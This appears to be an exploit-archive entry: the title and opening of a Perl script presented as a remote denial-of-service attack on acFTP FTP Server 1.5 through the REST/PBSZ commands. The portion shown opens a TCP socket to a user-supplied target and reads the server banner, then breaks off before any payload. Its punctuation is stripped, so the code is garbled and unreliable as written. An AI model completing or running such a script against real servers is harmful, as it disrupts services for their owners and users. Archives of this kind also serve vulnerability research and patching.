acFTP FTP Server 1.5 - 'REST/PBSZ' Remote Denial of Service
acFTP 1.5 REST/PBSZ Denial of Service author: gbr mail: gabrielquadrosathotmail.com use IO::Socket; if!defined$ARGV0 print "Usage: $0 ip port\n"; exit; my $sock = new IO::Socket::INETPeerAddr = $ARGV0, PeerPort = $ARGV1, Proto = 'tcp' or die "Could not open a socket: $!\n"; $sock-recv$buf, 1024;...